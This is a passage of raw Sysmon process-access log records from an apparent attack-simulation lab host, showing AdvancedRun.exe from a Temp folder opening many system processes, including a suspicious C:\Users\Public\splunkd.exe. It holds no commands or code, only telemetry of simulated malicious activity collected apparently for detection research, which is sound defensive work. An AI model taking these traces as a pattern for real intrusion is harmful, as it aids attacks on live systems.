20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.041{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004077842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004077841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:35.040{834264DD-14A0-61EB-9208-000000002702}60163328C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C: